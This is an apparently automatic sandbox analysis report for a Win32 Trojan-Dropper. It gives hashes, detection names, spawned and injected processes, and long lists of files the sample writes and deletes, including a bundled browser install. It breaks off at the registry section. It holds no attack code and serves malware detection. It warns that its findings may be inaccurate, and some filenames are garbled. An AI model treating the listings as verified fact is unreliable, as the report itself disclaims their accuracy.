Trojan-Dropper.Win32.Injector.jksa (Kaspersky), Gen:Variant.Graftor.Elzob.84 (B) (Emsisoft), Gen:Variant.Graftor.Elzob.84 (AdAware), GenericEmailWorm.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5b0348707a150821aaf29801d98ac60f
SHA1: 040a6a4247ee17fa7b8281caec76262e51138947
SHA256: 748f27ab38313af3423fca9997e41f45ff6a05aa20fbc7dab500727ffe573d96
SSDeep: 49152:Ec//////ZTIeezIl KqykWJQ2aM2zLoOVxkUAP30dIUmwiGECOIr2G2XP49ajkbP:Ec////// 1K6WJozLXn 30d7f25P4IjA
Size: 2692608 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: APPS installer
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
ksbinstaller_66_82685.exe:984
%original file name%.exe:1264
KNBCenter.exe:1240
regsvr32.exe:1536
liebao.exe:1780
liebao.exe:516
down_s_66_82685.exe:1988
ping.exe:972
wuauclt.exe:924
tencentdl.exe:1932
netsh.exe:320
Tencentdl.exe:848
0liebao.exe:1948
knbcenter.exe:2036
knbcenter.exe:916
reg.exe:1976
reg.exe:708
skinupdater.exe:348
The Trojan injects its code into the following process(es):
ÊÖ»úºäÕ¨»ú.exe:652
File activity
The process ksbinstaller_66_82685.exe:984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (586 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearchb.dat (6341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztma002d.psg (74 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.ini (172 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbpolicy.dll (15628 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\alipay.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\baifubao.png (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\atxhlp.dat (21 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\xinput1_3.dll (880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kdumprep.exe (7541 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\毒霸网å€大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3002.ksg (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseutil.dll (2976 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj021204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0005.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\unknown.ksg (422 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\libvideo.dat (15 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_unsafe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\bc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\vinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\spdb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepbb002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaevname.dat (108 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksedset.ini (425 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepc0002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7001.vsg (265 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\ä¿®å¤ÂÂæµÂÂ览器.lnk (748 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome.dll (503987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0002.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\cdeploy.dat (11 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Localauto.db (40 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\manifest.json (2 bytes)
%System%\drivers\ksapi.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\KNBDrv64.sys (1543 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\99bill.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Install.bat (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\npaliedit.dll (2836 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gare.db (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj011204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb7001.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3001.ksg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Extract.dll (3773 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\incognito.dat (1650 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepba000.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7999.vsg (266 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kmsgsvc.dll (8953 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac002.ksg (3702 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\skin_thumbnail.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\karchive.dat (101 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6001.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\boc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaext2.dat (85 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\skinupdater.exe (21987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\autofilljs2.dat (89 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\FixBrowser.exe (18429 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adfilter.dat (131 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0002.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kui.pak (30655 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvba012.vsg (273 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\en-US.pak (195 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBrowserUpgrade2.dll (2787 bytes)
%Documents and Settings%\%current user%\Desktop\猎豹安全æµÂÂ览器.lnk (634 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.fsg (120 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksecfg.ini (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\psbc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zema0007.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\befc2009.psg (82 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmb0014.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdet2.dll (10359 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\p1tl.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\mousegesturelib.xml (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\å¸载猎豹安全æµÂÂ览器.lnk (726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\newtab_img2.zip (7972 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\nologin.dat (897 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw2.dat (772 bytes)
%Program Files%\liebao\2014522163323984_1\browserpacket.xml (178 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_touch_100_percent.pak (6399 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbctrl.dll (3109 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ManualUpgrade.exe (9449 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\resources.pak (45687 bytes)
%Documents and Settings%\%current user%\Desktop\毒霸网å€大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\config\kseeat.cfg (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (238 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\trackers.dat (1760 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.sys (712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\ceb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences_resintall (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay_site.dat (19 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\tn.dat (1704 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.dat (327 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\AllSigns.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000f.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_en-US.pak (25 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksesscan.dll (7879 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\sqlite3.exe (5007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\ljdfelebfnfpjclmmkljlnagcdkpfpdl\1.0\Cached Theme.pak (6363 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\zlib1.dll (1112 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\KPreferences (503 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb8009.ksg (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uninst.exe (10202 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseexf.dat (107 bytes)
%Program Files%\liebao\liebao.exe (11518 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksepnf.dat (107 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\dlcore.dll (20026 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw.dat (669 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb8003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\checkvideo.dat (61 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb8008.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_46.dll (28052 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\localurl.db (3668 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kadfilter.dll (5863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\LegoIcon\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\MouseGesture.dll (8245 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\feature2.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libGLESv2.dll (5682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install_info.json (255 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay.dat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install2_log.log (72726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj101204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac001.ksg (1844 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\third_party\baidu_hd_query.dll (3341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmc0000.psg (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\czb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\pepflashplayer.dll (110917 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb7001.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBUpdateHelper.dll (13747 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ffmpegsumo.dll (11323 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\kvipinter.dll (3811 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\猎豹安全æµÂÂ览器.lnk (632 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.dll (691 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb9008.vsg (264 bytes)
%System%\drivers\KNBDrv64.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\hxb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseescan.dll (4564 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000b.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Logos.db (3769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0011.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ktoolupd.dll (2779 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\icbc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj141203.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.exe (14580 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6002.ksg (4 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipbb004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfb7001.fsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb0001.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\Allvinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseset.dat (229 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\srvpref.dat (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj051204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\zh-CN.pak (193 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\resource.dat (735 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Bookmarks (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_43.dll (15709 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.ksg (888 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0019.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\ksais.dat (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\anti_injection2.dat (710 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\scom.dll (1596 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libEGL.dll (1722 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kfcdetect.dll (7469 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\SecondaryTile.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\np-mswmp.dll (1724 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0005.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uplive.dll (15007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\sqlite.dll (1872 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvbb00d.vsg (270 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\signs.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\tenpay.png (2 bytes)
%Program Files%\liebao\test_access (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_100_percent.pak (6387 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\cmb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearcha.dat (1358 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gdeploy.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb9002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\gdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaextend.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\upgrade.dll (9080 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecoref.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipba004.ksg (7 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorea.dat (173 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kaxhlp.dll (4594 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adb_easylist.dat (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbdrv.sys (1326 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\webresource.dat (7712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.dll (210497 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\TNProxy.dll (5849 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.ico (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\switchcore.db (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\Cached Theme.pak (1610 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\knbcenter.exe (4415 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\unionpay.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxy.dll (4458 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kwnp.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\master_preferences (557 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Tencentdl.exe (8880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\sdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipc0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cyui.exe (3249 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_safe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdt.ini (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7002.vsg (294 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\DesktopTips.exe (7305 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_zh-CN.pak (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorem.dat (97 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\wd.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfc2009.psg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb7004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxyPS.dll (1806 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\猎豹安全æµÂÂ览器.lnk (652 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cysvc.dll (6685 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (0 bytes)
%Program Files%\liebao\2014522163323984_1 (0 bytes)
%Program Files%\liebao\test_access (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (0 bytes)
%Program Files%\liebao\4.5.34.6725 (0 bytes)
The process %original file name%.exe:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0liebao.exe (3750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ÊÖ»úºäÕ¨»ú.exe (12288 bytes)
The process KNBCenter.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\liebao\4.5.34.6725\Data\expand_safepay.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\manager.log (455 bytes)
%Program Files%\liebao\4.5.34.6725\log\kmctrl.log (1537 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\cleanup.log (1064 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (0 bytes)
The process liebao.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (32 bytes)
The process liebao.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\2.tmp (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000002.dbtmp (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\CURRENT~RFab99b.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\CURRENT (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State~RFab97b.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000003.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOCK (0 bytes)
The process down_s_66_82685.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.tmp (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (365108 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd (9216408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (3656 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (0 bytes)
The process wuauclt.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The process Tencentdl.exe:848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Tencent\QQDownload\122\dlcore.dll (14022 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe (6841 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\extract.dll (2105 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\DownloadProxyPS.dll (601 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\InstallInfo.xml (25 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\tnproxy.dll (2105 bytes)
The process 0liebao.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (350 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (5547 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (0 bytes)
Registry activity
The process ksbinstaller_66_82685.exe:984 makes changes in the system registry.
